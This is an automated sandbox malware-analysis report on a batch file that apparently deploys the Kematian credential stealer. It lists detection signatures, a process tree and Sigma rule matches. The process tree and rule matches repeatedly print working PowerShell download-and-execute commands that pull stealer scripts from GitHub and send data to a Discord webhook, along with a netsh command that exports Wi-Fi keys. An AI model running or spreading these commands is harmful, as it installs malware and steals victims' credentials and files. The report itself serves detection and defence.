Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
thegreatestexecutor.bat

Overview

General Information

Sample name:thegreatestexecutor.bat
Analysis ID:1467094
MD5:07f9549ba0e65bb2bd47fcf55c60a608
SHA1:50f97f17245b1967ae322f5a72f48184db4932fa
SHA256:84617e9c081b6b585582d2589aace5a0a7887283f9488b5a6d05906f94116f36
Tags:bat
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Sigma detected: Drops script at startup location
Yara detected PowerShell ScreenShot
Yara detected Powershell decode and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Drops script or batch files to the startup folder
Found Tor onion address
Found large BAT file
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: MSHTA Suspicious Execution 01
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Rundll32 Execution Without Parameters
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Tries to harvest and steal browser information (history, passwords, etc)
Uses netsh to dump wireless credentials
Uses netsh to modify the Windows network and firewall settings
Writes or reads registry keys via WMI
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Sigma detected: Wscript Shell Run In CommandLine
Steals Internet Explorer cookies
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 6592 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\thegreatestexecutor.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • findstr.exe (PID: 5172 cmdline: findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • powershell.exe (PID: 6660 cmdline: powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • findstr.exe (PID: 7316 cmdline: findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • findstr.exe (PID: 7336 cmdline: findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • chcp.com (PID: 7352 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
    • findstr.exe (PID: 7372 cmdline: findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • powershell.exe (PID: 7388 cmdline: powershell.exe -nop -c "Write-Host -NoNewLine $null" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 7476 cmdline: powershell.exe -nop -c "Write-Host -NoNewLine $null" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • rundll32.exe (PID: 7568 cmdline: rundll32 MD5: EF3179D498793BF4234F708D3BE28633)
    • net.exe (PID: 7608 cmdline: net session MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
      • net1.exe (PID: 7624 cmdline: C:\Windows\system32\net1 session MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
    • mshta.exe (PID: 7640 cmdline: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • powershell.exe (PID: 7696 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 8036 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • netsh.exe (PID: 3964 cmdline: "C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\user~1\AppData\Local\Temp\wifi key=clear MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
        • powershell.exe (PID: 1920 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1')) MD5: 04029E121A0CFA5991749937DD22A1D9)
          • csc.exe (PID: 3020 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • cvtres.exe (PID: 1848 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESA945.tmp" "c:\Users\user\AppData\Local\Temp\bekownh2\CSCE31222C310BD40CB8ED0AE4A3AB63C88.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • powershell.exe (PID: 1888 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1')) MD5: 04029E121A0CFA5991749937DD22A1D9)
  • svchost.exe (PID: 7764 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x426a70:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000022.00000002.2017068494.000001DF1C3C0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x3cb95c:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
00000022.00000002.1852694281.000001DF13ACC000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x3cbccc:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
00000022.00000002.1817228535.000001DF03E22000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x4b725:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
00000022.00000002.1852694281.000001DF13F87000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x3cbce4:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    Click to see the 6 entries

    Other

    SourceRuleDescriptionAuthorStrings
    amsi64_7696.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security
      amsi64_7696.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0xcad8:$b2: ::FromBase64String(
      • 0xf9d5:$b2: ::FromBase64String(
      • 0x15cc9:$b2: ::FromBase64String(
      • 0x1c62e:$b2: ::FromBase64String(
      • 0xf9bb:$b3: ::UTF8.GetString(
      • 0x15ca8:$b3: ::UTF8.GetString(
      • 0x1c614:$b3: ::UTF8.GetString(
      • 0xb9dc:$s1: -join
      • 0xe8cd:$s1: -join
      • 0x15fa2:$s1: -join
      • 0x1a236:$s1: -join
      • 0x1bacb:$s1: -join
      • 0x5188:$s4: +=
      • 0x524a:$s4: +=
      • 0x9471:$s4: +=
      • 0xb58e:$s4: +=
      • 0xb878:$s4: +=
      • 0xb9be:$s4: +=
      • 0x10ced:$s4: +=
      • 0x15f95:$s4: +=
      • 0x16bcd:$s4: +=
      amsi64_7696.amsi.csvMALWARE_Win_PWSH_PoshWiFiStealerDetects PowerShell PoshWiFiStealerditekSHen
      • 0x10a8b:$s1: netsh wlan export profile
      • 0x404d:$s2: Send-MailMessage

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Invoke-Obfuscation CLIP+ Launcher
      Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , CommandLine: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\thegreatestexecutor.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6592, ParentProcessName: cmd.exe, ProcessCommandLine: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , ProcessId: 7640, ProcessName: mshta.exe
      Sigma detected: Invoke-Obfuscation VAR+ Launcher
      Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , CommandLine: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\thegreatestexecutor.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6592, ParentProcessName: cmd.exe, ProcessCommandLine: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , ProcessId: 7640, ProcessName: mshta.exe
      Sigma detected: MSHTA Suspicious Execution 01
      Source: Process startedAuthor: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule): Data: Command: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , CommandLine: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\thegreatestexecutor.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6592, ParentProcessName: cmd.exe, ProcessCommandLine: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , ProcessId: 7640, ProcessName: mshta.exe
      Sigma detected: PowerShell Download and Execution Cradles
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , CommandLine: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\thegreatestexecutor.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6592, ParentProcessName: cmd.exe, ProcessCommandLine: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , ProcessId: 7640, ProcessName: mshta.exe
      Sigma detected: Rundll32 Execution Without Parameters
      Source: Process startedAuthor: Bartlomiej Czyz, Relativity: Data: Command: rundll32, CommandLine: rundll32, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\thegreatestexecutor.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6592, ParentProcessName: cmd.exe, ProcessCommandLine: rundll32, ProcessId: 7568, ProcessName: rundll32.exe
      Sigma detected: Suspicious Invoke-WebRequest Execution
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 7640, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex, ProcessId: 7696, ProcessName: powershell.exe
      Sigma detected: Suspicious MSHTA Child Process
      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 7640, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex, ProcessId: 7696, ProcessName: powershell.exe
      Sigma detected: Change PowerShell Policies to an Insecure Level
      Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}" , CommandLine: powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\thegreatestexecutor.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6592, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}" , ProcessId: 6660, ProcessName: powershell.exe
      Sigma detected: Dynamic .NET Compilation Via Csc.EXE
      Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1')) , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1920, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.cmdline", ProcessId: 3020, ProcessName: csc.exe
      Sigma detected: PowerShell Web Download
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , CommandLine: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\thegreatestexecutor.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6592, ParentProcessName: cmd.exe, ProcessCommandLine: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 